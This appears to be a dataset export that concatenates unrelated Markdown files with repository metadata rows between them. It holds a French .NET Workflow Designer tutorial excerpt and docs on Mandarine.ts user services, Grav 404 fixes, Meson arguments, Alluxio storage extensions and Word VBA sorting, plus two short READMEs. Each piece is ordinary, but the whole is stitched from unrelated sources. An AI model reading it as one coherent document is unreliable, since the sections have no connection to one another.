2. Pour déclarer un champ de membre privé pour contenir une instance du <xref:System.Activities.Presentation.WorkflowDesigner>, ajoutez le code suivant à la classe `MainWindow` :
```csharp
public partial class MainWindow : Window
{
private WorkflowDesigner wd;
public MainWindow()
{
InitializeComponent();
}
}
```
3. Ajoutez la méthode `AddDesigner` suivante à la classe `MainWindow`. L’implémentation crée une instance du <xref:System.Activities.Presentation.WorkflowDesigner>, y ajoute une activité de <xref:System.Activities.Statements.Sequence> et la place dans la colonne centrale de la **grille**grid1.
```csharp
private void AddDesigner()
{
// Create an instance of WorkflowDesigner class.
this.wd = new WorkflowDesigner();
// Place the designer canvas in the middle column of the grid.
Grid.SetColumn(this.wd.View, 1);
// Load a new Sequence as default.
this.wd.Load(new Sequence());
// Add the designer canvas to the grid.
grid1.Children.Add(this.wd.View);
}
```
4. Pour ajouter la prise en charge du concepteur pour toutes les activités intégrées, enregistrez les métadonnées du concepteur. Cela vous permet de déplacer des activités de la boîte à outils vers l’activité d' <xref:System.Activities.Statements.Sequence> d’origine dans le Concepteur de flux de travail. Pour ce faire, ajoutez la méthode `RegisterMetadata` à la classe `MainWindow` :
```csharp
private void RegisterMetadata()
{
var dm = new DesignerMetadata();
dm.Register();
}
```
Pour plus d’informations sur l’inscription des concepteurs d’activités, consultez [Comment : créer un concepteur d’activités personnalisées](how-to-create-a-custom-activity-designer.md).
5. Dans le constructeur de classes `MainWindow`, ajoutez des appels aux méthodes précédemment déclarées pour enregistrer les métadonnées dans le but de la prise en charge du concepteur et pour créer l'objet <xref:System.Activities.Presentation.WorkflowDesigner>.
```csharp
public MainWindow()
{
InitializeComponent();
// Register the metadata.
RegisterMetadata();
// Add the WFF Designer.
AddDesigner();
}
```
> [!NOTE]
> La méthode `RegisterMetadata` enregistre les métadonnées du concepteur relatives aux activités intégrées, dont l'activité <xref:System.Activities.Statements.Sequence>. Étant donné que la méthode `AddDesigner` utilise l'activité <xref:System.Activities.Statements.Sequence>, la méthode `RegisterMetadata` doit être appelée en premier.
9. Appuyez sur <kbd>F5</kbd> pour générer et exécuter la solution.
10. Consultez [tâche 3 : créer les volets boîte à outils et PropertyGrid](task-3-create-the-toolbox-and-propertygrid-panes.md) pour savoir comment ajouter la prise en charge de la **boîte à outils** et de **PropertyGrid** à votre concepteur de workflow réhébergé.
## <a name="see-also"></a>Voir aussi
- [Réhébergement du concepteur de flux de travail](rehosting-the-workflow-designer.md)
- [Tâche 1 : Créer une nouvelle application Windows Presentation Foundation](task-1-create-a-new-wpf-app.md)
- [Tâche 3 : Créer les volets Toolbox et PropertyGrid](task-3-create-the-toolbox-and-propertygrid-panes.md)
| 53.407692 | 445 | 0.711508 | fra_Latn | 0.914166 |
e047d402b61fdf793b8c80c7421973d28fb53fc7 | 1,538 | md | Markdown | docs/web/mandarine/mandarine-security/authentication-userdetailsservice.md | Fusselwurm/mandarinets | 348b3ade07bce3b0b2aadd85066ea21b9e808087 | [
"MIT"
] | 255 | 2020-05-11T22:34:06.000Z | 2022-03-29T16:33:34.000Z | docs/web/mandarine/mandarine-security/authentication-userdetailsservice.md | Fusselwurm/mandarinets | 348b3ade07bce3b0b2aadd85066ea21b9e808087 | [
"MIT"
] | 132 | 2020-05-22T16:45:13.000Z | 2022-02-28T16:39:41.000Z | docs/web/mandarine/mandarine-security/authentication-userdetailsservice.md | Fusselwurm/mandarinets | 348b3ade07bce3b0b2aadd85066ea21b9e808087 | [
"MIT"
] | 24 | 2020-05-16T18:48:47.000Z | 2022-03-19T20:31:51.000Z | # User Details Service
---------
## Overview
The User Details Service is a Mandarine-powered component (_preferably annotated with `@Service`_) which has a single responsability. This single responsability is to fetch a specific user from a collection of `Mandarine.Types.UserDetails`.
An User Details Service must implement `Mandarine.Types.UserDetailsService` otherwise it will result in failure at MCT (Mandarine Compile Time).
## `Mandarine.Types.UserDetailsService` interface
```typescript
export interface UserDetailsService {
/**
* Locates the user based on the username.
*
* @param username the username identifying the user whose data is required.
*
* @returns A user record with an implementation of UserDetails
*
* @throws MandarineSecurityException if no user was found.
*/
loadUserByUsername: (username: string) => Mandarine.Types.UserDetails;
}
```
- loadUserByUsername
- Fetches an user based on an username from a collection that implements `Mandarine.Types.UserDetails`.
## Basic Usage
```typescript
import { Service, Mandarine } from "https://deno.land/x/[email protected]/mod.ts";
@Service()
export class UserDetailsServiceImplementation implements Mandarine.Security.Auth.UserDetailsService {
public users: Array<Mandarine.Types.UserDetails> = new Array<Mandarine.Types.UserDetails>();
public loadUserByUsername(username: string) {
return this.users.find((item: Mandarine.Types.UserDetails) => item.username === username);
}
}
``` | 34.177778 | 242 | 0.742523 | eng_Latn | 0.868529 |
e047d792fc69188c71e9a35518a4d81649a59d42 | 4,627 | md | Markdown | pages/11.troubleshooting/01.page-not-found/docs.md | weeyin83/grav-learn | 8cb6e17ed236930108e3fbf93ca0e55b0e4ea72d | [
"MIT"
] | 1 | 2020-06-02T07:06:23.000Z | 2020-06-02T07:06:23.000Z | pages/11.troubleshooting/01.page-not-found/docs.md | weeyin83/grav-learn | 8cb6e17ed236930108e3fbf93ca0e55b0e4ea72d | [
"MIT"
] | null | null | null | pages/11.troubleshooting/01.page-not-found/docs.md | weeyin83/grav-learn | 8cb6e17ed236930108e3fbf93ca0e55b0e4ea72d | [
"MIT"
] | 1 | 2021-01-20T08:14:35.000Z | 2021-01-20T08:14:35.000Z | ---
title: 404 Not Found
taxonomy:
category: docs
---
There are a couple of reasons you might receive a **Not Found** error, and they are each caused by different factors.
 {.bordered}
!! The examples below are for the Apache Web Server which is the most common server software used.
### IIS use of .htaccess file
After adding URL Rewrite to the IIS server using the Web Platform Installer, restart the IIS server. Go to the management interface, IIS, double-click on URL Rewrite, under Inbound Rules, click on Import Rules, under Rules to Import, browse to the Configuration file, choosing the .htaccess file in the root, and then click on Import. Restart the IIS server. Access Grav now.
### Missing .htaccess File
The first thing to check is if you have the provided `.htaccess` file at the root of your Grav installation. Because this is a **hidden** file, you won't normally see this in your explorer or finder windows. If you have extracted Grav then **selected** and **moved** or **copied** the files, you may well have left this very important file behind.
It is **strongly advised** to unzip Grav and move the **entire folder** into place, then simply rename the folder. This will ensure all the files retain their proper positions.
### AllowOverride All
In order for the Grav-provided `.htaccess` to be able to set the rewrite rules required for routing to work properly, Apache needs to first read the file. When your `<Directory>` or `<VirtualHost>` directive is setup with `AllowOverride None`, the `.htaccess` file is completely ignored. The simplest solution is to change this to `AllowOverride All`
where RewriteRule is used, **FollowSymLinks** or **SymLinksIfOwnerMatch** needs to be set in Options directive. Simply add on the same line '+FollowSymlinks' after 'Options'
More details on `AllowOverride` and all the possible configuration options can be found in the [Apache Documentation](http://httpd.apache.org/docs/2.4/mod/core.html#allowoverride).
### RewriteBase Issue
If the homepage of your Grav site loads, but **any other page** displays this very rough _Apache-style_ error, then the most likely cause is that there is a problem with your `.htaccess` file.
The default `.htaccess` that comes bundled with Grav works fine out-of-the-box in most cases. However, there are certain setups involving virtual hosts where the file system does not match the virtual hosting setup directly. In these cases you must configure the `RewriteBase` option in the `.htaccess` to point to the correct path.
There is a short explanation of this in the `.htaccess` file itself:
```
##
# If you are getting 404 errors on subpages, you may have to uncomment the RewriteBase entry
# You should change the '/' to your appropriate subfolder. For example if you have
# your Grav install at the root of your site '/' should work, else it might be something
# along the lines of: RewriteBase /<your_sub_folder>
##
# RewriteBase /
```
Simply remove the `#` before the `RewriteBase /` directive to uncomment it, and adjust the path to match your server environment.
We've included additional information to help you locate and troubleshoot your `.htaccess` file in our [htaccess guide](../htaccess).
### Missing Rewrite Modules
Some webserver packages (I'm looking at your EasyPHP and WAMP!) do not come with the Apache **rewrite** module enabled by default. They usually can be enabled from the configuration settings for Apache, or you can do so manually via the `httpd.conf` by uncommenting this line (or something similar) so they are loaded by Apache:
```
#LoadModule rewrite_module modules/mod_rewrite.so
```
Then restart your Apache server.
### Grav Error 404 Page
 {.bordered}
If you receive a _Grav-style_ error saying **Error 404** then your `.htaccess` is functioning correctly, but you're trying to reach a page that Grav cannot find.
The most common cause of this is simply that the page has been moved or renamed. Another thing to check is if the page has a `slug` set in the page YAML headers. This overrides the explicit folder name that is used by default to construct the URL.
Another cause could be your page is **not routable**. The routable option for a page can be set in the [page headers](../../content/headers).
### 404 Page Not Found on Nginx
If your site is in a subfolder, make sure your nginx.conf location points to that subfolder. Grav's [sample nginx.conf](https://github.com/getgrav/grav/blob/master/webserver-configs/nginx.conf) has a comment in the code that explains how.
| 61.693333 | 375 | 0.7614 | eng_Latn | 0.99888 |
e048452ad39ee51a5227044379391c6befedecb1 | 543 | md | Markdown | README.md | jamesabel/hashy | b66eaee68524dc8cd7f0141a8a033fe786535322 | [
"MIT"
] | null | null | null | README.md | jamesabel/hashy | b66eaee68524dc8cd7f0141a8a033fe786535322 | [
"MIT"
] | null | null | null | README.md | jamesabel/hashy | b66eaee68524dc8cd7f0141a8a033fe786535322 | [
"MIT"
] | null | null | null | # hashy
Another hash library.
hashy provides an md5, sha256 or sha512 for string, file, dict, list and set.
String and file hashes are conventional and can be compared to other implementations. For example
you can go to an online hash calculator for "a" and get the same hash as hashy generates.
Hashes for complex data types like dict, list and set are specific to hashy.
# Example
```
from hashy import get_string_sha256
print(get_string_sha256("a"))
# prints
# ca978112ca1bbdcafac231b39a23dc4da786eff8147c4e72b9807785afee48bb
```
| 22.625 | 97 | 0.78453 | eng_Latn | 0.997182 |
e0497b2695bb03dc5c7711dfe949bd1f16b0ba11 | 4,454 | md | Markdown | _get_started/create/basic_markup.th.md | adamcbrewer/amp-docs | 9916e4b0cd10068ebbd4ea1dba5f0cc363f68b03 | [
"Apache-2.0"
] | null | null | null | _get_started/create/basic_markup.th.md | adamcbrewer/amp-docs | 9916e4b0cd10068ebbd4ea1dba5f0cc363f68b03 | [
"Apache-2.0"
] | null | null | null | _get_started/create/basic_markup.th.md | adamcbrewer/amp-docs | 9916e4b0cd10068ebbd4ea1dba5f0cc363f68b03 | [
"Apache-2.0"
] | null | null | null | ---
layout: page
title: สร้างหน้า AMP HTML
order: 0
locale: th
---
มาร์กอัปต่อไปนี้คือจุดเริ่มต้นหรือต้นแบบที่ดี
ให้คัดลอกและบันทึกลงในไฟล์ที่มีส่วนขยาย .html
{% highlight html %}
<!doctype html>
<html amp lang="en">
<head>
<meta charset="utf-8">
<title>Hello, AMPs</title>
<link rel="canonical" href="http://example.ampproject.org/article-metadata.html" />
<meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
<script type="application/ld+json">
{
"@context": "http://schema.org",
"@type": "NewsArticle",
"headline": "Open-source framework for publishing content",
"datePublished": "2015-10-07T12:02:41Z",
"image": [
"logo.jpg"
]
}
</script>
<style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
<script async src="https://cdn.ampproject.org/v0.js"></script>
</head>
<body>
<h1>Welcome to the mobile web</h1>
</body>
</html>
{% endhighlight %}
ส่วนเนื้อความในตัวอย่างจะค่อนข้างตรงไปตรงมา แต่มีการเพิ่มโค้ดหลายอย่างไว้ที่ส่วนหัวของหน้าซึ่งคุณอาจไม่ทันได้สังเกต ลองมาดูมาร์กอัปที่จำเป็นกัน
## มาร์กอัปที่จำเป็น
เอกสาร AMP HTML จะต้อง:
- เริ่มต้นด้วย doctype `<!doctype html>`
- มีแท็ก `<html ⚡>` ระดับบนสุด (สามารถใช้ `<html amp>` ได้เช่นกัน)
- มีแท็ก `<head>` และ `<body>` (มีหรือไม่ก็ได้ใน HTML)
- มีแท็ก `<link rel="canonical" href="$SOME_URL" />` อยู่ภายในส่วนหัวที่นำไปยังเอกสาร AMP HTML เวอร์ชัน HTML ปกติหรือไปยังหน้านั้นเองในกรณีที่ไม่มีเวอร์ชัน HTML
- มีแท็ก `<meta charset="utf-8">` เป็นรายการย่อยแรกของแท็กส่วนหัว
- มีแท็ก `<meta name="viewport" content="width=device-width,minimum-scale=1">` อยู่ในแท็กส่วนหัว โดยแนะนำให้ใส่ initial-scale=1 ไว้ด้วย
- มีแท็ก `<script async src="https://cdn.ampproject.org/v0.js"></script>` เป็นอิลิเมนต์สุดท้ายในส่วนหัว (ซึ่งรวมถึงและการโหลดไลบรารี AMP JS)
- มีรายการต่อไปนี้ในแท็ก `<head>`:
`<style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>`
## เมตาดาตาที่จะมีหรือไม่ก็ได้
นอกเหนือจากข้อกำหนดโดยทั่วไป ตัวอย่างของเรายังมีการใช้ข้อกำหนด Schema.org ในส่วนหัว ซึ่งไม่ใช่ข้อกำหนดที่จำเป็นต้องใช้สำหรับ AMP แต่จำเป็นต้องมีเพื่อให้สามารถเผยแพร่เนื้อหาของคุณไปยังปลายทางที่ระบุ เช่น ใน[การสาธิตการแสดงข่าวแบบหมุนใน Google Search (ให้ลองใช้บนโทรศัพท์ของคุณ)](https://g.co/ampdemo)
หากต้องการเรียนรู้เพิ่มเติมเกี่ยวกับเมตาดาตาทั้งหมดที่คุณจำเป็นต้องใช้ในที่ต่างๆ เช่น Twitter [ให้ดูตัวอย่างของเรา](https://github.com/ampproject/amphtml/tree/master/examples/metadata-examples) หากต้องการเรียนรู้เฉพาะเจาะจงเกี่ยวกับ AMP ใน Google Search ดู[การแสดงเรื่องเด่นด้วย AMP](https://developers.google.com/structured-data/carousels/top-stories)
<hr>
ข่าวดี! คุณได้ดำเนินการต่างๆ ที่จำเป็นสำหรับการสร้าง AMP หน้าแรกแล้ว อย่างไรก็ตาม ยังมีเนื้อหาในส่วนเนื้อความไม่มากนัก ในส่วนต่อไป เราจะกล่าวถึงวิธีการเพิ่มรายการพื้นฐาน เช่น รูปภาพ อิลิเมนต์ AMP แบบกำหนดเอง การจัดรูปแบบหน้าเว็บของคุณ และการจัดเค้าโครงแบบอินเทอร์แอคทีฟ
{% include button.html title="ไปยังขั้นตอนที่ 2" link="/docs/get_started/create/include_image.th.html" %}
| 67.484848 | 769 | 0.713965 | tha_Thai | 0.459422 |
e049e82c1b3a7eea296bc3a31eee7075ac25083c | 1,835 | md | Markdown | docs/markdown/Adding-arguments.md | kvaghel1/meson | 506fbafed53c2f98986dfeaa5677cb6813b6e182 | [
"Apache-2.0"
] | null | null | null | docs/markdown/Adding-arguments.md | kvaghel1/meson | 506fbafed53c2f98986dfeaa5677cb6813b6e182 | [
"Apache-2.0"
] | null | null | null | docs/markdown/Adding-arguments.md | kvaghel1/meson | 506fbafed53c2f98986dfeaa5677cb6813b6e182 | [
"Apache-2.0"
] | null | null | null | ---
short-description: Adding compiler arguments
...
# Adding arguments
Often you need to specify extra compiler arguments. Meson provides two different ways to achieve this: global arguments and per-target arguments.
Global arguments
--
Global compiler arguments are set with the following command. As an example you could do this.
```meson
add_global_arguments('-DFOO=bar', language : 'c')
```
This makes Meson add the define to all C compilations. Usually you would use this setting for flags for global settings. Note that for setting the C/C++ language standard (the `-std=c99` argument in GCC), you would probably want to use a default option of the `project()` function. For details see the [reference manual](Reference manual).
Global arguments have certain limitations. They all have to be defined before any build targets are specified. This ensures that the global flags are the same for every single source file built in the entire project with one exception. Compilation tests that are run as part of your project configuration do not use these flags. The reason for that is that you may need to run a test compile with and without a given flag to determine your build setup. For this reason tests do not use these global arguments.
You should set only the most essential flags with this setting, you should *not* set debug or optimization flags. Instead they should be specified by selecting an appropriate build type.
Per target arguments
--
Per target arguments are just as simple to define.
```meson
executable('prog', 'prog.cc', cpp_args : '-DCPPTHING')
```
Here we create a C++ executable with an extra argument that is used during compilation but not for linking.
Specifying extra linker arguments is done in the same way:
```meson
executable('prog', 'prog.cc', link_args : '-Wl,--linker-option')
```
| 45.875 | 509 | 0.774387 | eng_Latn | 0.999297 |
e04a45dd0718c92e60fc7484aaa6021bbc77fcb0 | 5,299 | md | Markdown | docs/en/DevelopingUFSExtensions.md | shaileshcheke/alluxio | 5b143d63aa397a752ce64ae0f24de677327a732d | [
"Apache-2.0"
] | 2 | 2018-11-14T10:38:41.000Z | 2019-03-01T12:57:22.000Z | docs/en/DevelopingUFSExtensions.md | shaileshcheke/alluxio | 5b143d63aa397a752ce64ae0f24de677327a732d | [
"Apache-2.0"
] | 1 | 2016-02-18T09:58:14.000Z | 2016-02-18T10:07:39.000Z | docs/en/DevelopingUFSExtensions.md | shaileshcheke/alluxio | 5b143d63aa397a752ce64ae0f24de677327a732d | [
"Apache-2.0"
] | null | null | null | ---
layout: global
group: Resources
title: Developing Under Storage Extensions
---
* Table of Contents
{:toc}
This page is intended for developers of under storage extensions. Please look at [managing
extensions](UFSExtensions.html) for a guide to using existing extensions.
Under storage extensions are built as JARs and included at a specific extensions location to be
picked up by core Alluxio. This page describes the mechanics of how extensions in Alluxio work, and
provides detailed instructions for developing an under storage extension. Extensions provide a
framework to enable more under storages to work with Alluxio and makes it convenient to develop
modules not already supported by Alluxio.
# How it Works
## Service Discovery
Extension JARs are loaded dynamically at runtime by Alluxio servers, which enables Alluxio to talk
to new under storage systems without requiring a restart. Alluxio servers use Java
[ServiceLoader](https://docs.oracle.com/javase/7/docs/api/java/util/ServiceLoader.html) to discover
implementations of the under storage API. Providers include implementations of the
`alluxio.underfs.UnderFileSystemFactory` interface. The implementation is advertised by including a
text file in `META_INF/services` with a single line pointing to the class implementing the said
interface.
## Dependency Management
Implementors are required to include transitive dependencies in their extension JARs. Alluxio performs
isolated classloading for each extension JARs to avoid dependency conflicts between Alluxio servers and
extensions.
# Implementing an Under Storage Extension
Building a new under storage connector involves:
- Implementing the required under storage interface
- Declaring the service implementation
- Bundling up the implementation and transitive dependencies in an uber JAR
A reference implementation can be found in the [alluxio-extensions](https://github.com/Alluxio
/alluxio-extensions/tree/master/underfs/tutorial) repository. In the rest of this section we
describe the steps involved in writing a new under storage extension. The sample project, called
`DummyUnderFileSystem`, uses maven as the build and dependency management tool, and forwards all
operations to a local filesystem.
## Implement the Under Storage Interface
The [HDFS Submodule](https://github.com/alluxio/alluxio/tree/master/underfs/hdfs) and [S3A Submodule](https://github.com/alluxio/alluxio/tree/master/underfs/s3a) are two good examples of how to enable a storage system to serve as Alluxio's underlying storage.
Step 1: Implement the interface `UnderFileSystem`
The `UnderFileSystem` interface is defined in the module `org.alluxio:alluxio-core-common`. Choose
to extend either `BaseUnderFileSystem` or `ObjectUnderFileSystem` to implement the `UnderFileSystem`
interface. `ObjectUnderFileSystem` is suitable for connecting to object storage and abstracts away
mapping file system operations to an object store.
```java
public class DummyUnderFileSystem extends BaseUnderFileSystem {
// Implement filesystem operations
...
}
```
or,
```java
public class DummyUnderFileSystem extends ObjectUnderFileSystem {
// Implement object store operations
...
}
```
Step 2: Implement the interface `UnderFileSystemFactory`
The under storage factory determines defines which paths the `UnderFileSystem` implementation
supports, and how to create the `UnderFileSystem` implementation.
```java
public class DummyUnderFileSystemFactory implements UnderFileSystemFactory {
...
@Override
public UnderFileSystem create(String path, UnderFileSystemConfiguration conf) {
// Create the under storage instance
}
@Override
public boolean supportsPath(String path) {
// Choose which schemes to support, e.g., dummy://
}
}
```
## Declare the Service
Create a file at `src/main/resources/META_INF/services/alluxio.underfs.UnderFileSystemFactory`
advertising the implemented `UnderFileSystemFactory` to the ServiceLoader.
```
alluxio.underfs.dummy.DummyUnderFileSystemFactory
```
## Build
Include all transitive dependencies of the extension project in the built JAR using either
`maven-shade-plugin` or `maven-assembly`.
In addition, to avoid collisions specify scope for the dependency `alluxio-core-common` as
`provided`. The maven definition would look like:
```xml
<dependencies>
<!-- Core Alluxio dependencies -->
<dependency>
<groupId>org.alluxio</groupId>
<artifactId>alluxio-core-common</artifactId>
<scope>provided</scope>
</dependency>
...
</dependencies>
```
## Test
Extend `AbstractUnderFileSystemContractTest` to test that the defined `UnderFileSystem` adheres to
the contract between Alluxio and an under storage module. Look at the reference implementation to
include parameters such as the working directory for the test.
```java
public final class DummyUnderFileSystemContractTest extends AbstractUnderFileSystemContractTest {
...
}
```
Congratulations! You have developed a new under storage extension to Alluxio. Let the community
know by submitting a pull request to the Alluxio
[repository](https://github.com/Alluxio/alluxio/tree/master/docs/en/UFSExtensions.md) to edit the
list of extensions section on the [documentation page](UFSExtensions.html).
| 36.798611 | 259 | 0.792791 | eng_Latn | 0.984696 |
e04b12080661182d4bd2a97b597f1acaf383f29f | 54 | md | Markdown | README.md | mhstnsc/zio-reproducer | d92c6e3d906f24b661ae95cdbd0bcc580bd3e358 | [
"Apache-2.0"
] | null | null | null | README.md | mhstnsc/zio-reproducer | d92c6e3d906f24b661ae95cdbd0bcc580bd3e358 | [
"Apache-2.0"
] | null | null | null | README.md | mhstnsc/zio-reproducer | d92c6e3d906f24b661ae95cdbd0bcc580bd3e358 | [
"Apache-2.0"
] | null | null | null | # zio-reproducer
Just a project to preset reproducers
| 18 | 36 | 0.814815 | eng_Latn | 0.991292 |
e04b24b96d45a73f7517d04b2ea8c9e6f2d89ad5 | 425 | md | Markdown | _site/shorts/2022-04-20-oclif-the-open-cli-framework.md | planetoftheweb/raybo.org | fbc2226bd8f47ebb9760f69186fa52284e0112de | [
"MIT"
] | null | null | null | _site/shorts/2022-04-20-oclif-the-open-cli-framework.md | planetoftheweb/raybo.org | fbc2226bd8f47ebb9760f69186fa52284e0112de | [
"MIT"
] | null | null | null | _site/shorts/2022-04-20-oclif-the-open-cli-framework.md | planetoftheweb/raybo.org | fbc2226bd8f47ebb9760f69186fa52284e0112de | [
"MIT"
] | null | null | null | ---
layout: post.njk
title: "OCLIF CLI Framework"
summary: "I love CLIs...or Command Line Interfaces, so I've been really interested in this framework that can help you set them up a bit quicker. It lets you use Node so you can work with JavaScript instead oof something like Bash to work on your CLI."
thumb: "/images/shorts/2022-04-20_19-21-29.png"
links:
- website: "https://oclif.io/"
category:
tags:
- external
---
| 35.416667 | 253 | 0.731765 | eng_Latn | 0.979313 |
e04b46f4f04142382b50bb0859d83792a2b598a1 | 5,088 | md | Markdown | VBA/Word-VBA/articles/range-sort-method-word.md | oloier/VBA-content | 6b3cb5769808b7e18e3aff55a26363ebe78e4578 | [
"CC-BY-4.0",
"MIT"
] | 584 | 2015-09-01T10:09:09.000Z | 2022-03-30T15:47:20.000Z | VBA/Word-VBA/articles/range-sort-method-word.md | oloier/VBA-content | 6b3cb5769808b7e18e3aff55a26363ebe78e4578 | [
"CC-BY-4.0",
"MIT"
] | 585 | 2015-08-28T20:20:03.000Z | 2018-08-31T03:09:51.000Z | VBA/Word-VBA/articles/range-sort-method-word.md | oloier/VBA-content | 6b3cb5769808b7e18e3aff55a26363ebe78e4578 | [
"CC-BY-4.0",
"MIT"
] | 590 | 2015-09-01T10:09:09.000Z | 2021-09-27T08:02:27.000Z | ---
title: Range.Sort Method (Word)
keywords: vbawd10.chm157155812
f1_keywords:
- vbawd10.chm157155812
ms.prod: word
api_name:
- Word.Range.Sort
ms.assetid: 2030f99e-0307-d2b7-9e14-1d0888f3fda6
ms.date: 06/08/2017
---
# Range.Sort Method (Word)
Sorts the paragraphs in the specified range.
## Syntax
_expression_ . **Sort**( **_ExcludeHeader_** , **_FieldNumber_** , **_SortFieldType_** , **_SortOrder_** , **_FieldNumber2_** , **_SortFieldType2_** , **_SortOrder2_** , **_FieldNumber3_** , **_SortFieldType3_** , **_SortOrder3_** , **_SortColumn_** , **_Separator_** , **_CaseSensitive_** , **_BidiSort_** , **_IgnoreThe_** , **_IgnoreKashida_** , **_IgnoreDiacritics_** , **_IgnoreHe_** , **_LanguageID_** )
_expression_ Required. A variable that represents a **[Range](range-object-word.md)** object.
### Parameters
|**Name**|**Required/Optional**|**Data Type**|**Description**|
|:-----|:-----|:-----|:-----|
| _ExcludeHeader_|Optional| **Variant**| **True** to exclude the first row or paragraph header from the sort operation. The default value is **False** .|
| _FieldNumber_|Optional| **Variant**|The fields by which to sort. Microsoft Word sorts by FieldNumber, then by FieldNumber2, and then by FieldNumber3.|
| _SortFieldType_|Optional| **Variant**|The respective sort types for FieldNumber. Can be one of the **WdSortFieldType** constants. The default value is **wdSortFieldAlphanumeric** . Some of these constants may not be available to you, depending on the language support (U.S. English, for example) that you have selected or installed.|
| _SortOrder_|Optional| **Variant**|The sorting order to use when sorting FieldNumber. Can be any **WdSortOrder** constant.|
| _FieldNumber2_|Optional| **Variant**|The fields by which to sort.|
| _SortFieldType2_|Optional| **Variant**|The respective sort types for FieldNumber2. Can be one of the **WdSortFieldType** constants. The default value is **wdSortFieldAlphanumeric** . Some of these constants may not be available to you, depending on the language support (U.S. English, for example) that you have selected or installed.|
| _SortOrder2_|Optional| **Variant**|The sorting order to use when sorting FieldNumber2. Can be any **WdSortOrder** constant.|
| _FieldNumber3_|Optional| **Variant**|The fields by which to sort.|
| _SortFieldType3_|Required||Some of these constants may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed. The default value is **wdSortFieldAlphanumeric** . Some of these constants may not be available to you, depending on the language support (U.S. English, for example) that you have selected or installed.|
| _SortOrder3_|Optional| **Variant**|The sorting order to use when sorting FieldNumber3. Can be any **WdSortOrder** constant.|
| _SortColumn_|Optional| **Variant**| **True** to sort only the column specified by the **Range** object.|
| _Separator_|Optional| **Variant**|The type of field separator. Can be one of the **WdSortSeparator** constants.|
| _CaseSensitive_|Optional| **Variant**| **True** to sort with case sensitivity. The default value is **False** .|
| _BidiSort_|Optional| **Variant**| **True** to sort based on right-to-left language rules. This argument may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed.|
| _IgnoreThe_|Optional| **Variant**| **True** to ignore the Arabic character alef lam when sorting right-to-left language text. This argument may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed.|
| _IgnoreKashida_|Optional| **Variant**| **True** to ignore kashidas when sorting right-to-left language text. This argument may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed.|
| _IgnoreDiacritics_|Optional| **Variant**| **True** to ignore bidirectional control characters when sorting right-to-left language text. This argument may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed.|
| _IgnoreHe_|Optional| **Variant**| **True** to ignore the Hebrew character he when sorting right-to-left language text. This argument may not be available to you, depending on the language support (U.S. English, for example) that you?ve selected or installed.|
| _LanguageID_|Optional| **Variant**|Specifies the sorting language. Can be one of the **WdLanguageID** constants. Refer to the Object Browser for a list of the **WdLanguageID** constants.|
## Example
This example inserts three lines of text into a new document and then sorts the lines in ascending alphanumeric order
```vb
Sub NewParagraphSort()
Dim newDoc As Document
Set newDoc = Documents.Add
newDoc.Content.InsertAfter "pear" &; Chr(13) _
&; "zucchini" &; Chr(13) &; "apple" &; Chr(13)
newDoc.Content.Sort SortOrder:=wdSortOrderAscending
End Sub
```
## See also
#### Concepts
[Range Object](range-object-word.md)
| 66.947368 | 410 | 0.741745 | eng_Latn | 0.970116 |
e04c4e323eaf812b66fca408d515c0ad1bba7afd | 339 | md | Markdown | README.md | ARNhacker/ARNhacker.github.io | 6ba554b47dfce58e7634962a985007f4774e3b83 | [
"MIT"
] | null | null | null | README.md | ARNhacker/ARNhacker.github.io | 6ba554b47dfce58e7634962a985007f4774e3b83 | [
"MIT"
] | null | null | null | README.md | ARNhacker/ARNhacker.github.io | 6ba554b47dfce58e7634962a985007f4774e3b83 | [
"MIT"
] | null | null | null | # [Le-Pen.fr](http://www.le-pen.fr)
## Contribuer
Pour contribuer, forkez ce repo, faites vos modifications, puis envoyez une Pull-Request !
## Copyright and License
Copyright 2013-2016 Blackrock Digital LLC. Code released under the [MIT](https://github.com/BlackrockDigital/startbootstrap-scrolling-nav/blob/gh-pages/LICENSE) license. | 37.666667 | 169 | 0.775811 | kor_Hang | 0.276329 |
e04c77da76edc7fe7bf0e46a150f720ea5630659 | 2,115 | md | Markdown | projects/Week 2 - COVID-19.md | dannylarrea/weekly-projects | ca5cb74edfb2d09ef2d1759823e3922c047e312e | [
"MIT"
] | 425 | 2020-03-09T16:05:37.000Z | 2022-03-30T14:08:22.000Z | projects/Week 2 - COVID-19.md | dannylarrea/weekly-projects | ca5cb74edfb2d09ef2d1759823e3922c047e312e | [
"MIT"
] | 19 | 2020-03-09T16:53:09.000Z | 2020-10-07T05:55:57.000Z | projects/Week 2 - COVID-19.md | dannylarrea/weekly-projects | ca5cb74edfb2d09ef2d1759823e3922c047e312e | [
"MIT"
] | 133 | 2020-03-10T14:40:27.000Z | 2022-03-20T08:05:39.000Z | # COVID-19 Tracker
### *Use this app to spread awareness in your community and encourage safety measures.*
An application where the user can search and see information about the spread of COVID-19
- In order to complete this project you need to use a COVID-19 API (or any other method you prefer) to find and display information.
## User Stories
